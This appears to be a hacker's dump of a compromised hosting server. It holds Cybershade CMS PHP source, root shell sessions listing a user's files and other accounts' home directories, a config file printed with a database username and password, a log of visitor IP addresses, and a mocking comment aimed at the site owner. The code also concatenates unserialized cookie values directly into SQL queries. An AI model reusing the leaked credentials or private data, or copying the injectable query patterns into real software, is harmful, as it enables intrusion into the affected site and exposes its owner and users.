1697. define('IS_ADMIN', $_user->check_permissions($config['global']['user']['id'],
1698. ADMIN));
1699.  
1700. /////////////////////////////////////////////////////////////////////////////
1701. //--Grab the neccesarry cache files----------------------------------------//
1702. /////////////////////////////////////////////////////////////////////////////
1703. //this defines which of the cache files to include
1704. //require($cms_root.'core/cacher.php');
1705.  
1706.  
1707. /////////////////////////////////////////////////////////////////////////////
1708.  
1709. //--Cacher.php-------------------------------------------------------------//
1710.  
1711. /////////////////////////////////////////////////////////////////////////////
1712. $cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
1713. 'user_permissions', NULL);#'badwords', 'affiliates',
1714. $x=0;
1715. include($cms_root."cache/cache.php");
1716. while($var = $cache_gen[$x]){
1717. if($var != ''){
1718. $gen = NULL;
1719. eval('$gen = $'.$var.'_db;');
1720.  
1721. /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
1722. include($cms_root."cache/cache_".$var.".php");
1723. eval('$gen = $'.$var.'_db;');
1724. }*/
1725. if ($gen !== NULL || !empty($gen)){
1726. foreach($gen as $k => $v){
1727. $config[$var][$k] = $v;
1728. }
1729. }else{
1730. //regenerate the cache if not avalible
1731. switch($var){
1732. case 'config':
1733. $config[$var] = $_cache->generate_cache("config_db",
1734. "cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
1735. break;
1736. case 'minimenu':
1737. $config[$var] = $_cache->generate_cache("minimenu_db",
1738. "cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
1739. disporder ASC");
1740. break;
1741.  
1742. case 'menu':
1743. $config[$var] = $_cache->generate_cache("menu_db",
1744. "cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
1745. ASC", NNUM);
1746. :
1747. break;
1748.  
1749. case 'statistics':
1750. $config[$var] = $_cache->generate_statistics_cache();
1751. break;
1752.  
1753. case 'groups':
1754. $config[$var] = $_cache->generate_cache("groups_db",
1755. "cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
1756. rank DESC");
1757. break;
1758. case 'bans':
1759. $config[$var] = $_cache->generate_cache("bans_db",
1760. "cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
1761. break;
1762. //case 'affiliates':
1763. // $config[$var] =
1764. $_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
1765. ".$config['db']['prefix']."affiliates");
1766. //break;
1767. //case 'module_permissions':
1768. // $config[$var] =
1769. $_cache->generate_cache("module_permissions_db",
1770. "cache_module_permissions.php", "SELECT * FROM
1771. ".$config['db']['prefix']."module_permissions");
1772. //break;
1773. case 'user_permissions':
1774. $config[$var] = $_cache->generate_upermissions_cache();
1775.  
1776. break;
1777. }
1778.  
1779. }
1780. }
1781. $x++;
1782. }
1783.  
1784. /////////////////////////////////////////////////////////////////////////////
1785.  
1786. //--Cacher.php-------------------------------------------------------------//
1787.  
1788. /////////////////////////////////////////////////////////////////////////////
1789.  
1790.  
1791. $_user->groups = $config['groups'];
1792. //$_user->module_permissions = $config['module_permissions'];
1793. $_user->permissions = $config['user_permissions'];
1794.  
1795. /////////////////////////////////////////////////////////////////////////////
1796. //--Cron - This will sort the majority of the cache and--------------------//
1797. //---------db problems out for us------------------------------------------//
1798. /////////////////////////////////////////////////////////////////////////////
1799.  
1800. //include($cms_root.'core/cron.php');
1801.  
1802.  
1803. /////////////////////////////////////////////////////////////////////////////
1804.  
1805. //--Cron.php---------------------------------------------------------------//
1806.  
1807. /////////////////////////////////////////////////////////////////////////////
1808.  
1809. if(!defined('NO_DB')){
1810. $hourly_cron = FALSE;
1811. if(isset($config['site']['hourly_time'])){
1812. if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
1813. $_sql->updateRow("statistics", array('value' => time()),
1814. "variable = 'hourly_cron'");
1815. $hourly_cron = TRUE;
1816. } else {
1817. if($config['site']['hourly_time'] == 0){
1818. $hourly_cron = TRUE;
1819. }else{
1820. if((time() - $config['site']['hourly_time']) >
1821. $config['statistics']['hourly_cron']){
1822. $_sql->updateRow("statistics", array('value' =>
1823. time()), "variable = 'hourly_cron'");
1824. $hourly_cron = TRUE;
1825. }
1826. :
1827. }
1828. }
1829. }
1830.  
1831. $daily_cron = FALSE;
1832. if(isset($config['site']['daily_time'])){
1833. if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
1834. $_sql->updateRow("statistics", array('value' => time()),
1835. "variable = 'daily_cron'");
1836. $daily_cron = TRUE;
1837. } else {
1838. if($config['site']['daily_time'] == 0){
1839. $daily_cron = TRUE;
1840. }else{
1841. if((time() - $config['site']['daily_time']) >
1842. $config['statistics']['daily_cron']){
1843. $_sql->updateRow("statistics", array('value' =>
1844. time()), "variable = 'daily_cron'");
1845. $daily_cron = TRUE;
1846. }
1847. }
1848. }
1849. }
1850.  
1851. $weekly_cron = FALSE;
1852. if(isset($config['site']['weekly_time'])){
1853. if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
1854. $_sql->updateRow("statistics", array('value' => time()),
1855. "variable = 'weekly_cron'");
1856. $weekly_cron = TRUE;
1857. } else {
1858. if($config['site']['weekly_time'] == 0){
1859. $weekly_cron = TRUE;
1860. }else{
1861. if((time() - $config['site']['weekly_time']) >
1862. $config['statistics']['weekly_cron']){
1863. $_sql->updateRow("statistics", array('value' =>
1864. time()), "variable = 'weekly_cron'");
1865. $weekly_cron = TRUE;
1866. }
1867. }
1868. }
1869. }
1870. }
1871.  
1872. $stat_cache = false;
1873. if(!defined('NO_DB')){
1874. if($hourly_cron){
1875. $_sql->record_message('Hourly CRON is running');
1876. //delete users from sql that are inactive and set users offline
1877. that are inactive too
1878. $_sql->query("UPDATE shr_users
1879. SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
1880. cs_online.uid = shr_users.id)
1881. WHERE EXISTS
1882. ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
1883. shr_users.id)");
1884. $_sql->deleteRow('online', "login_time <
1885. ".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
1886. ".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
1887. $_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
1888. "66.249%"');
1889. $_cache->generate_statistics_cache();
1890. $stat_cache = true;
1891.  
1892. }
1893.  
1894. if($daily_cron){
1895. $_sql->record_message('Daily CRON is running');
1896. //update caches
1897. if(!$stat_cache){
1898. $_cache->generate_statistics_cache();
1899. $stat_cache = true;
1900. :
1901. }
1902.  
1903. if($config['forum']['auto_lock']){
1904. //Auto Lock Thread Timer
1905. $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
1906. '', 1);
1907. $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
1908. <= $ex", 1);
1909. }
1910.  
1911. $_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
1912. expire < ".time()."");
1913.  
1914. $_cache->generate_upermissions_cache();
1915. $_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
1916. FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
1917. $_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
1918. FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
1919. //$_cache->generate_cache("module_permissions_db",
1920. "cache_module_permissions.php", "SELECT * FROM
1921. ".$config['db']['prefix']."module_permissions");
1922.  
1923. }
1924.  
1925. if($weekly_cron){
1926. $_sql->record_message('Weekly CRON is running');
1927. if(!$stat_cache){
1928. $_cache->generate_statistics_cache();
1929. $stat_cache = true;
1930. }
1931.  
1932. $_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
1933. ".$config['db']['prefix']."config");
1934. $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
1935. FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
1936.  
1937. //Optimise all of the tables in the DB
1938. $alltables = $_sql->getTable("SHOW TABLES");
1939. $tables = '';
1940. $counter = count($alltables);
1941. $x = 0;
1942. $add = ", ";
1943. foreach($alltables as $table){
1944. foreach ($table as $tablename){
1945. if($x == ($counter-1)){
1946. $add = '';
1947. }
1948. $tables .= "`$tablename`$add";
1949. $x++;
1950. }
1951. }
1952. $_sql->query("OPTIMIZE TABLE $tables");
1953. $_sql->updateRow("statistics", array('value' => time()), "variable
1954. = 'weekly_time'", FALSE);
1955. }
1956.  
1957. if($weekly_cron || $daily_cron || $hourly_cron){
1958. define('FILE_MERGE', 1);
1959. include($cms_root.'merge.php');
1960. }
1961. }
1962.  
1963. /////////////////////////////////////////////////////////////////////////////
1964.  
1965. //--Cron.php---------------------------------------------------------------//
1966.  
1967. /////////////////////////////////////////////////////////////////////////////
1968.  
1969. /////////////////////////////////////////////////////////////////////////////
1970. //--Check weather the site is closed---------------------------------------//
1971. /////////////////////////////////////////////////////////////////////////////
1972. if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
1973. if (!$_user->check_permissions($config['global']['user']['id'],
1974. ADMIN)){
1975. die(die_error(4));
1976. :
1977. }
1978. }
1979.  
1980. /////////////////////////////////////////////////////////////////////////////
1981. //--Check weather a user is banned-----------------------------------------//
1982. /////////////////////////////////////////////////////////////////////////////
1983. /**
1984. if ($config['bans'] != NULL){
1985. foreach ($config['bans'] as $bans){
1986. if ($bans['user_ip'] == $config['global']['ip']){
1987. die(die_error($bans['die']));
1988. }
1989. }
1990. }
1991. **/
1992.  
1993. /////////////////////////////////////////////////////////////////////////////
1994. //--Sort out the guests & users online stuff-------------------------------//
1995. /////////////////////////////////////////////////////////////////////////////
1996.  
1997. //include($cms_root.'core/usertracker.php');
1998.  
1999.  
2000. /////////////////////////////////////////////////////////////////////////////
2001.  
2002. //--UserTracker.php--------------------------------------------------------//
2003.  
2004. /////////////////////////////////////////////////////////////////////////////
2005. if(!defined('NO_DB') && !defined('NO_LOG')){
2006.  
2007. if(!isset($_SESSION['user']['userkey'])){
2008. //cookie check
2009. if(!$_user->is_online){
2010. if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
2011. !empty($_COOKIE[$config['db']['ckefix'].'login'])){
2012. $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
2013. if(isset($cookie[1]) && (int)isset($cookie[0])){
2014. if($cookie[1] ==
2015. $_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
2016. if($config['login']['autologinIpRestriction']) $aq
2017. = " AND user_ip = '".getIP()."'";
2018. $query = $_sql->getTable("SELECT uid FROM
2019. ".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
2020. = '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
2021. if (count($query) == 1){
2022. $user = $_sql->getTable("SELECT timestamp
2023. FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
2024. if($user!==NULL){
2025. $user = $user[0];
2026.  
2027. $_sess->set_sessions($cookie[0]);
2028.  
2029. $_SESSION['user']['last_visit']
2030. = $user['timestamp'];
2031. $_user->new_user($cookie[0], 'alogin');
2032.  
2033.  
2034. if($_user->get_new_threads($_SESSION['user']['last_visit']))
2035. setNotification('We have just updated your
2036. forum icons to reflect new posts.', 'Forum Icons Updated', false,
2037. $_SESSION['user']['id']);
2038. $config['global']['user']['id'] =
2039. $_SESSION['user']['id'];
2040. }
2041. }else{//if count query == 1
2042. setcookie($config['db']['ckefix']."login",
2043. null, time() - 31536000); //set cookie to remember me
2044.  
2045. unset($_COOKIE[$config['db']['ckefix']."login"]);
2046. }
2047. }else{ //if cookie == http user agent
2048. setcookie($config['db']['ckefix']."login",
2049. null, time() - 31536000); //set cookie to remember me
2050.  
2051. unset($_COOKIE[$config['db']['ckefix']."login"]);
2052. }
2053. }else{//if cookie info == valid
2054. setcookie($config['db']['ckefix']."login", null, time()
2055. - 31536000); //set cookie to remember me
2056. unset($_COOKIE[$config['db']['ckefix']."login"]);
2057. }
2058. redirect($_SERVER["PHP_SELF"]);
2059.  
2060. }
2061. }
2062. $_user->new_user($config['global']['user']['id']);
2063. }else{
2064. $return = $_user->update_location();
2065. if($return == 0){
2066. $_user->new_user($config['global']['user']['id']);
2067. }
2068. }
2069.  
2070. }
2071.  
2072. /////////////////////////////////////////////////////////////////////////////
2073.  
2074. //--UserTracker.php--------------------------------------------------------//
2075.  
2076. /////////////////////////////////////////////////////////////////////////////
2077.  
2078. /**
2079. * Thanks to Jesus for this baby, this will add the level of sanitation
2080. required for the diffrent data types
2081. */
2082. function secureit($string, $type=''){
2083. switch($type){
2084. case 'post':
2085. $string = mysql_real_escape_string($string);
2086. break;
2087. default:
2088. $string = mysql_real_escape_string($string);
2089. $string = htmlentities($string);
2090. $string = stripslashes($string);
2091. $string = strip_tags($string);
2092. break;
2093. }
2094. return $string;
2095. }
2096. if (isset($_GET['code']) &&
2097. $_user->check_permissions($config['global']['user']['id'], DEV)) {
2098. $explode = explode('/', $_SERVER['PHP_SELF']);
2099. die(highlight_file($explode[count($explode)-1], 1));
2100. }
2101. ?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
2102. core]# less Gre.php
2103. <?php
2104. /*======================================================================*\
2105. | Cybershade CMS - Your CMS, Your Way. |
2106. \*======================================================================*/
2107. if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
2108.  
2109. error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
2110. define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
2111. //this is to start the generation timer off
2112. $gen_time = microtime();
2113.  
2114. //Include the session stuff
2115. if(!SMODE) require($cms_root."core/classes/class.session.php");
2116. if(SMODE) require($cms_root."core/classes/classes.php");
2117. $_sess = new session;
2118.  
2119. //Set the headers
2120. header("Cache-control: private");
2121. header("Content-Type: text/html; charset=utf-8");
2122. //ob_start("ob_gzhandler");
2123.  
2124. /////////////////////////////////////////////////////////////////////////////
2125. //--Include the core CMS files needed -------------------------------------//
2126. core.php
2127. /////////////////////////////////////////////////////////////////////////////
2128. :
2129. ://The config files
2130. :require($cms_root."core/config.php");
2131. :
2132. :/*this is the ultimate cache-er xD, k so basically u got
2133. : * the var below which "allows" the static cacher through
2134. : */
2135. :
2136. :#$allow = true;
2137. :
2138. ://this little switch decided what should be auto cache'd
2139. :/*switch(CMS_MENU){
2140. : case 'forum': $allow = false; break;
2141. : case 'admin': $allow = false; break;
2142. : case 'ucp': $allow = false; break;
2143. : case 'login': $allow = false; break;
2144. : case 'main': $allow = false; break;
2145. : case 'pm': $allow = false; break;
2146. : default: $allow = true; break;
2147. :}
2148. :
2149. :if($allow){
2150. : // Get the modification date of this PHP file
2151. : $timestamps = array(@getlastmod());
2152. :
2153. : // The latest of these modification dates is our real Last-Modified date
2154. : $timestamp = max($timestamps);
2155. :
2156. : // Note that this is not a RFC 822 date (the tz is always GMT)
2157. : $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
2158. :
2159. : // Check if the client has the same page cached
2160. : if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
2161. : ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
2162. : header("HTTP/1.1 304 Not Modified");
2163. : exit();
2164. : }
2165. : // Inform the user what is our last modification date
2166. : else {
2167. : header("Last-Modified: " . $tsstring);
2168. : }
2169. :}*/
2170. :
2171. ://The class files
2172. :require($cms_root."core/classes/class.sql.php");
2173. :if(!SMODE)require($cms_root."core/classes/class.login.php");
2174. :if(!SMODE)require($cms_root."core/classes/class.user.php");
2175. :if(!SMODE)require($cms_root."core/classes/class.form.php");
2176. :if(!SMODE)require($cms_root."core/classes/class.time.php");
2177. :require($cms_root."core/classes/class.nbbc.php");
2178. :require($cms_root."core/classes/class.tpl.php");
2179. :if(!SMODE)require($cms_root."core/classes/class.cache.php");
2180. :require($cms_root."core/classes/class.geshi.php");
2181. :
2182. ://The base functions
2183. :require($cms_root."core/base_functions.php");
2184. :
2185. ://///////////////////////////////////////////////////////////////////////////
2186. ://--Sort out the cached config stuff---------------------------------------//
2187. ://///////////////////////////////////////////////////////////////////////////
2188. :$config_db = array();
2189. ://check see if the config file exists, if not then just create a blank config
2190. va
2191. :riable
2192. :if(file_exists($cms_root."cache/cache_config.php")){ include
2193. $cms_root."cache/ca
2194. :che_config.php"; }
2195. :
2196. ://If the config_db is not null, cached.. then use it.
2197. :if($config_db !== NULL){
2198. : foreach($config_db as $array){
2199. : $config[$array['array']][$array['var']] = $array['value'];
2200. : }
2201. : unset($array);
2202. :}
2203. :
2204. :if(isset($_GET['_site'])){
2205. : $a=(isset($_GET['_site']) ? $_GET['_site'] :
2206. (isset($_SESSION['site']['mode'
2207. :]) ? $_SESSION['site']['mode'] : $config['db']['prefix']));
2208. : switch($a){
2209. : case 'dmz':
2210. : $_SESSION['site']['mode'] = 'dmz_';
2211. : break;
2212. : case 'cs':
2213. : $_SESSION['site']['mode'] = 'cs_';
2214. : break;
2215. : default:
2216. : }
2217. :}
2218. :if(isset($_SESSION['site']['mode']))
2219. : $config['db']['prefix'] = $_SESSION['site']['mode'];
2220. :
2221. ://///////////////////////////////////////////////////////////////////////////
2222. ://--Define new instances of required classes-------------------------------//
2223. ://///////////////////////////////////////////////////////////////////////////
2224. ://start the sql
2225. :$_sql = new sql(true);
2226. :$_sql->config = $config;
2227. :if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
2228. :if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
2229. :
2230. :
2231. ://Open the session stuff
2232. :$_sess->sql = $_sql;
2233. :$_sess->config = $config;
2234. :
2235. ://start the form class
2236. :$_form = new form;
2237. :
2238. ://start the user class
2239. :$_user = new user;
2240. :$_user->config = $config;
2241. :$_user->sql = $_sql;
2242. root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/
2243.  
2244. # RoMeO's butt buddy xlink aka mad php c0d3r
2245. root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
2246. ls -al
2247. drwxr-xr-x 2 romeo romeo 4096 Dec 23 14:31 .htpasswd
2248. drwxr-xr-x 2 root root 4096 May 23 00:10 logs
2249. drwx--x--x 3 romeo romeo 4096 Dec 23 14:31 public_ftp
2250. drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
2251. drwxr-xr-x 2 root root 4096 May 1 00:10 stats
2252. root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
2253. cd public_html/
2254. root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
2255. public_html]# ls -al
2256. total 1188
2257. drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 .
2258. drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 ..
2259. -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 400.shtml
2260. -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 401.shtml
2261. -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 403.shtml
2262. -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 404.shtml
2263. -rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 500.shtml
2264. -rw-r--r-- 1 romeo romeo 5254 Feb 16 08:01 acp.php
2265. -rw-r--r-- 1 romeo romeo 9757 Feb 16 08:01 ajax.php
2266. -rw-r--r-- 1 romeo romeo 2118 Feb 16 08:01 articles.php
2267. drwxrwxrwx 5 romeo romeo 4096 Feb 10 19:31 cache
2268. drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 cgi-bin
2269. -rw-r--r-- 1 romeo romeo 5561 Feb 16 08:01 challenges.php
2270. -rw-r--r-- 1 romeo romeo 466963 Mar 1 14:51 cms_docs.zip
2271. -rw-r--r-- 1 romeo romeo 2137 Feb 10 19:31 codebase.php
2272. -rw-r--r-- 1 romeo romeo 17251 Feb 10 19:31 convertor.php
2273. drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 core
2274. -rw-r--r-- 1 romeo romeo 0 Feb 10 19:31 debug
2275. -rw-r--r-- 1 romeo romeo 3266 Feb 10 19:31 eg.gif
2276. -rw-r--r-- 1 romeo romeo 28213 Mar 20 12:59 farm.php
2277. -rw-r--r-- 1 romeo romeo 5020 Feb 16 08:01 forgotpass.php
2278. -rw-r--r-- 1 romeo romeo 7097 Feb 19 14:12 forum.php
2279. -rw-r--r-- 1 romeo romeo 2110 Feb 16 08:01 get_shouts.php
2280. -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:12 .htaccess
2281. -rw-r--r-- 1 romeo romeo 36 Feb 10 19:31 .htpasswd
2282. drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 images
2283. drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 img
2284. -rw-r--r-- 1 romeo romeo 3998 Feb 16 08:01 index.php
2285. -rw-r--r-- 1 romeo romeo 843 Feb 16 08:01 irc.php
2286. drwxr-xr-x 3 romeo romeo 4096 Feb 10 19:31 language
2287. -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:12 latest_posts.php
2288. -rwxr-xr-x 1 romeo romeo 7184 Feb 16 08:01 loader.php
2289. -rw-r--r-- 1 romeo romeo 8398 Feb 16 08:01 login.php
2290. -rwxr-xr-x 1 romeo romeo 13954 Feb 10 19:31 logo.jpg
2291. -rw-r--r-- 1 romeo romeo 3006 Feb 16 08:01 merge.php
2292. drwxr-xr-x 20 romeo romeo 4096 Feb 17 09:01 modules
2293. -rw-r--r-- 1 romeo romeo 10964 Feb 16 08:01 pastebin.php
2294. -rw-r--r-- 1 romeo romeo 35466 Feb 19 14:39 post.php
2295. -rw-r--r-- 1 romeo romeo 2142 Feb 16 08:01 privatemessages.php
2296. -rw-r--r-- 1 romeo romeo 9755 Feb 21 09:08 register.php
2297. -rw-r--r-- 1 romeo romeo 7986 Feb 16 08:01 rss.php
2298. drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 scripts
2299. -rw-r--r-- 1 romeo romeo 1065 Feb 16 08:01 search.php
2300. -rw-r--r-- 1 romeo romeo 1838 Feb 16 08:01 settings.php
2301. drwxr-xr-x 8 romeo romeo 4096 Mar 19 10:13 skin
2302. -rw-r--r-- 1 romeo romeo 196608 Mar 19 10:20 skin.tgz
2303. -rw-r--r-- 1 romeo romeo 636 Feb 16 08:01 staff.php
2304. -rw-r--r-- 1 romeo romeo 133049 May 23 04:00 stress_test.txt
2305. -rw-r--r-- 1 romeo romeo 994 Feb 10 19:31 swiigle_upload.php
2306. drwxr-xr-x 5 romeo romeo 4096 Feb 16 19:13 template
2307. -rw-r--r-- 1 romeo romeo 454 Feb 10 19:31 template.php
2308. -rw-r--r-- 1 romeo romeo 590 Feb 10 19:31 test.php
2309. drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 txt docs
2310. -rw-r--r-- 1 romeo romeo 2708 Feb 16 08:01 ucp.php
2311. -rw-r--r-- 1 romeo romeo 8546 Feb 19 14:12 view_group.php
2312. -rw-r--r-- 1 romeo romeo 876 Feb 16 08:01 view_profile.php
2313. -rw-r--r-- 1 romeo romeo 12838 Feb 19 14:12 view_topic.php
2314. -rw-r--r-- 1 romeo romeo 9571 Feb 16 08:01 windowed_options.php
2315. root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
2316. public_html]# cd core
2317. root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
2318. core]# ls -al
2319. total 164
2320. drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 .
2321. drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 ..
2322. -rw-r--r-- 1 romeo romeo 731 Feb 10 19:31 admin.js
2323. -rw-r--r-- 1 romeo romeo 27175 Feb 16 19:00 base_functions.php
2324. -rw-r--r-- 1 romeo romeo 9266 Feb 16 19:00 bbcode_tags.php
2325. -rw-r--r-- 1 romeo romeo 2816 Feb 10 19:31 cacher.php
2326. drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 classes
2327. -rw-r--r-- 1 romeo romeo 1376 Feb 16 19:00 cli.php
2328. -rw-r--r-- 1 romeo romeo 2847 Feb 10 19:33 config.php
2329. -rw-r--r-- 1 romeo romeo 23727 Feb 17 09:53 core.php
2330. -rw-r--r-- 1 romeo romeo 4518 Feb 10 19:31 cron.php
2331. drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 err
2332. -rw-r--r-- 1 romeo romeo 236 Feb 16 19:00 force_user.php
2333. drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 functions
2334. -rw-r--r-- 1 romeo romeo 1181 Feb 16 19:00 key.php
2335. -rw-r--r-- 1 romeo romeo 6903 Feb 16 19:00 mailer.php
2336. drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 mint
2337. -rw-r--r-- 1 romeo romeo 3054 Feb 16 19:00 page_footer.php
2338. -rw-r--r-- 1 romeo romeo 6429 Feb 16 19:00 page_header.php
2339. -rw-r--r-- 1 romeo romeo 9762 Feb 16 19:00 recaptchalib.php
2340. -rw-r--r-- 1 romeo romeo 6601 Apr 5 12:58 security.php
2341. -rw-r--r-- 1 romeo romeo 2760 Feb 16 19:00 usertracker.php
2342. root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
2343. core]# less config.php
2344. <?php
2345. //Cybershade.Org
2346.  
2347. //Database Stuff
2348. $config['db']['host'] = 'localhost';
2349. $config['db']['username'] = 'romeo_romeo';
2350. $config['db']['password'] = 'swU55ath';
2351. $config['db']['database'] = 'romeo_DMZ_CS';
2352. $config['db']['prefix'] = 'cs_';
2353. $config['db']['shrfix'] = 'shr_'; //the prefix
2354. f
2355. or the shared tables
2356. $config['db']['ckefix'] = 'CMS_'; //the cookie prefix
2357. $config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
2358.  
2359. is also a good way to invalidate the autologins on cms update
2360. $config['site']['working_dir'] = '';
2361.  
2362. //config vars for if we loose the DB
2363. $config['cms']['name'] = 'DarkMindZ';
2364. $config['cms']['version'] = '_DDoS';
2365. $config['cms']['debug'] = "0";
2366. $config['site']['title'] = 'CyberShade CMS';
2367. $config['site']['theme'] = 'cs';
2368. $config['site']['language'] = 'en';
2369. root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
2370. public_html]# less stress_test.txt
2371. /codebase/perl-2.html - 74.6.17.162 - Queries: 26 - SQLTime: 68.93934 -
2372. PAGETime
2373. r: -0.83011 |
2374. /register.php - 89.149.254.135 - Queries: 5 - SQLTime: 10.82445 - PAGETimer:
2375. 0.2
2376. 6816 |
2377. /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.93658 - PAGETimer:
2378. 0.1065
2379. 6 |
2380. /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.43613 - PAGETimer:
2381. 0.0528
2382. 6 |
2383. /index.php - 89.149.254.135 - Queries: 8 - SQLTime: 30.80612 - PAGETimer:
2384. 0.0420
2385. 1 |
2386. /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 12.93695 - PAGETimer:
2387. 0.0522
2388. 9 |
2389. /index.php - 89.149.254.135 - Queries: 8 - SQLTime: 14.52338 - PAGETimer:
2390. 0.0435
2391. 5 |
2392. /login.php - 89.149.254.135 - Queries: 6 - SQLTime: 14.55832 - PAGETimer:
2393. 0.0514
2394. 6 |
2395. /forum/post.php?mode=lock_thread&id=5559 - 74.6.17.162 - Queries: 10 - SQLTime:
2396.  
2397. 30.93873 - PAGETimer: 0.2404 |
2398. /forum/thread5853.html - 66.249.70.100 - Queries: 18 - SQLTime: 41.73033 -
2399. PAGET
2400. imer: 0.09753 |
2401. /codebase/mailform-asp-num147.html - 65.55.211.89 - Queries: 9 - SQLTime:
2402. 13.306
2403. 77 - PAGETimer: 0.11182 |
2404. / - 216.80.92.36 - Queries: 8 - SQLTime: 21.05451 - PAGETimer: 0.05534 |
2405. root@server2:~[root@server2 ~]# cd /home
2406. root@server2:/home[root@server2 home]# ls -la
2407. total 152
2408. drwx--x--x 36 root root 4096 May 23 02:33 .
2409. drwx--x--x 25 root root 4096 May 22 09:26 ..
2410. drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 aaa
2411. drwx--x--x 6 admin admin 4096 Jan 12 14:29 admin
2412. drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 beyond
2413. drwx--x--x 4 bloo bloo 4096 May 23 02:04 bloo
2414. drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 bootroot
2415. drwx------ 2 clamav clamav 4096 Apr 1 22:35 clamav
2416. drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 dablitz
2417. drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 dakilla
2418. drwxr-xr-x 2 root root 4096 Dec 3 2007 ftp
2419. drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 furiogamin
2420. drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 h3mod
2421. drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 haiobr
2422. drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 hbxmike
2423. drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 hotglow
2424. drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 hrdev
2425. drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 hstrike
2426. drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 kaza
2427. drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 keytraderz
2428. drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 mrgod
2429. drwx--x--x 5 odin odin 4096 May 8 05:01 odin
2430. drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 pagewiz
